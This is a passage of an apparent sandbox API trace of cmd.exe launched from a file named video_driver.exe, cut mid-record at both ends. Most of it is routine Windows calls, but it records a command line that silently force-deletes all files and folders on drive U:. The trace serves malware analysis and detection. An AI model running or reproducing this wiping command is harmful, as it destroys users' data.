dwThreadId=0xacc) returned 0x60 [0065.699] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.700] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.700] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.701] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.701] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fcac | out: phkResult=0x24fcac*=0x0) returned 0x2 [0065.701] VirtualQuery (in: lpAddress=0x24fce3, lpBuffer=0x24fc7c, dwLength=0x1c | out: lpBuffer=0x24fc7c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.701] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fc7c, dwLength=0x1c | out: lpBuffer=0x24fc7c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.701] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fc7c, dwLength=0x1c | out: lpBuffer=0x24fc7c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.701] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fc7c, dwLength=0x1c | out: lpBuffer=0x24fc7c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.701] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fc7c, dwLength=0x1c | out: lpBuffer=0x24fc7c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.701] GetConsoleOutputCP () returned 0x1b5 [0065.701] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.701] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.702] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.702] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.702] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.702] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.703] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.703] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.703] GetEnvironmentStringsW () returned 0x4820f8* [0065.703] GetProcessHeap () returned 0x470000 [0065.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xaca) returned 0x482bd0 [0065.703] FreeEnvironmentStringsW (penv=0x4820f8) returned 1 [0065.703] GetProcessHeap () returned 0x470000 [0065.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x481898 [0065.703] GetEnvironmentStringsW () returned 0x4820f8* [0065.703] GetProcessHeap () returned 0x470000 [0065.704] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xaca) returned 0x4836a8 [0065.704] FreeEnvironmentStringsW (penv=0x4820f8) returned 1 [0065.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ec1c | out: phkResult=0x24ec1c*=0x68) returned 0x0 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x0, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x1, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x1, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x0, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x40, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x40, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.704] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x40, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.704] RegCloseKey (hKey=0x68) returned 0x0 [0065.704] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ec1c | out: phkResult=0x24ec1c*=0x68) returned 0x0 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x40, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x1, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x1, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x0, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x9, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x4, lpData=0x24ec28*=0x9, lpcbData=0x24ec20*=0x4) returned 0x0 [0065.705] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ec24, lpData=0x24ec28, lpcbData=0x24ec20*=0x1000 | out: lpType=0x24ec24*=0x0, lpData=0x24ec28*=0x9, lpcbData=0x24ec20*=0x1000) returned 0x2 [0065.705] RegCloseKey (hKey=0x68) returned 0x0 [0065.705] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.705] srand (_Seed=0x5eb34b6b) [0065.705] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" [0065.705] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" [0065.705] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.706] GetProcessHeap () returned 0x470000 [0065.706] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x4820f8 [0065.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x482100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.706] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.706] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.706] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.706] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.706] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.706] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.706] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.706] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.706] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.706] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.707] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.707] GetProcessHeap () returned 0x470000 [0065.707] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482bd0 | out: hHeap=0x470000) returned 1 [0065.707] GetEnvironmentStringsW () returned 0x482310* [0065.707] GetProcessHeap () returned 0x470000 [0065.707] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae2) returned 0x484c70 [0065.707] FreeEnvironmentStringsW (penv=0x482310) returned 1 [0065.707] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.707] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.707] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.707] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.707] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.707] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.707] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.707] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.707] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.707] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.707] GetProcessHeap () returned 0x470000 [0065.707] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x4817c8 [0065.707] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f9e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f9e8, lpFilePart=0x24f9e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f9e4*="Desktop") returned 0x25 [0065.708] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.708] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f764 | out: lpFindFileData=0x24f764*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x485760 [0065.708] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0065.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f764 | out: lpFindFileData=0x24f764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x485760 [0065.708] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0065.708] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f764 | out: lpFindFileData=0x24f764*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x485760 [0065.708] FindClose (in: hFindFile=0x485760 | out: hFindFile=0x485760) returned 1 [0065.709] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.709] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.709] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.709] GetProcessHeap () returned 0x470000 [0065.709] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484c70 | out: hHeap=0x470000) returned 1 [0065.709] GetEnvironmentStringsW () returned 0x484180* [0065.709] GetProcessHeap () returned 0x470000 [0065.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb36) returned 0x485fa0 [0065.709] FreeEnvironmentStringsW (penv=0x484180) returned 1 [0065.709] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.709] GetProcessHeap () returned 0x470000 [0065.709] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4817c8 | out: hHeap=0x470000) returned 1 [0065.709] GetProcessHeap () returned 0x470000 [0065.709] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x486ae0 [0065.710] GetProcessHeap () returned 0x470000 [0065.710] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa0) returned 0x482e50 [0065.710] GetProcessHeap () returned 0x470000 [0065.710] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486ae0 | out: hHeap=0x470000) returned 1 [0065.710] GetConsoleOutputCP () returned 0x1b5 [0065.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.710] GetUserDefaultLCID () returned 0x409 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fb28, cchData=128 | out: lpLCData="0") returned 2 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fb28, cchData=128 | out: lpLCData="0") returned 2 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fb28, cchData=128 | out: lpLCData="1") returned 2 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.711] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.712] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.712] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.713] GetProcessHeap () returned 0x470000 [0065.713] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x482ef8 [0065.713] GetConsoleTitleW (in: lpConsoleTitle=0x482ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.714] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.714] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.714] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.714] GetProcessHeap () returned 0x470000 [0065.714] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x486ae0 [0065.715] GetProcessHeap () returned 0x470000 [0065.715] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x48aaf8 [0065.715] GetProcessHeap () returned 0x470000 [0065.715] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x4857e0 [0065.715] GetEnvironmentVariableW (in: lpName="p IN (\"U", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="CD") returned 13 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="ERRORLEVEL") returned 11 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="CMDEXTVERSION") returned 13 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="CMDCMDLINE") returned 13 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="DATE") returned 12 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="TIME") returned -4 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="RANDOM") returned -2 [0065.715] _wcsicmp (_String1="p IN (\"U", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.715] GetProcessHeap () returned 0x470000 [0065.715] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4857e0 | out: hHeap=0x470000) returned 1 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48aaf8 | out: hHeap=0x470000) returned 1 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x48aaf8 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48aaf8 | out: hHeap=0x470000) returned 1 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486ae0 | out: hHeap=0x470000) returned 1 [0065.716] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.716] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.716] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.716] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.716] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483110 [0065.716] GetProcessHeap () returned 0x470000 [0065.716] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x47ffc0 [0065.717] GetProcessHeap () returned 0x470000 [0065.717] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x4857e0 [0065.718] GetProcessHeap () returned 0x470000 [0065.718] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4857e0, Size=0x16) returned 0x481800 [0065.718] GetProcessHeap () returned 0x470000 [0065.718] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x481800) returned 0x16 [0065.718] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483170 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4831d0 [0065.719] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.719] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x4831f0 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x4857e0 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4857e0, Size=0x14) returned 0x483210 [0065.719] GetProcessHeap () returned 0x470000 [0065.719] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x483210) returned 0x14 [0065.720] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.720] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.720] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.720] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.720] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.720] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.720] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.720] GetProcessHeap () returned 0x470000 [0065.720] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483230 [0065.720] GetProcessHeap () returned 0x470000 [0065.720] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x47ffd8 [0065.721] GetProcessHeap () returned 0x470000 [0065.721] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x483290 [0065.721] GetProcessHeap () returned 0x470000 [0065.721] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x4832c0 [0065.722] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.722] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.722] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.722] GetProcessHeap () returned 0x470000 [0065.722] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483320 [0065.722] GetProcessHeap () returned 0x470000 [0065.722] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x483380 [0065.722] GetProcessHeap () returned 0x470000 [0065.722] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4833d0 [0065.723] GetProcessHeap () returned 0x470000 [0065.723] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4833d0, Size=0x12) returned 0x4833d0 [0065.723] GetProcessHeap () returned 0x470000 [0065.723] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4833d0) returned 0x12 [0065.723] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.723] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.723] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.723] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.723] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.723] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.724] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.724] GetProcessHeap () returned 0x470000 [0065.724] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x4833f0 [0065.725] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.725] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.725] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.725] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.725] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.725] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.725] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.725] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.725] GetProcessHeap () returned 0x470000 [0065.725] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483410 [0065.725] GetProcessHeap () returned 0x470000 [0065.725] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x483470 [0065.726] GetProcessHeap () returned 0x470000 [0065.726] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x4857e0 [0065.727] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.731] GetFullPathNameW (in: lpFileName="U:", nBufferLength=0x208, lpBuffer=0x24f818, lpFilePart=0x24f5c4 | out: lpBuffer="U:\\", lpFilePart=0x24f5c4*=0x0) returned 0x3 [0065.731] wcsncmp (_String1="U:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -7 [0065.736] GetFileAttributesW (lpFileName="U:\\" (normalized: "u:")) returned 0xffffffff [0065.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.740] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.740] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.740] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.740] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.741] SetConsoleInputExeNameW () returned 0x1 [0065.741] GetConsoleOutputCP 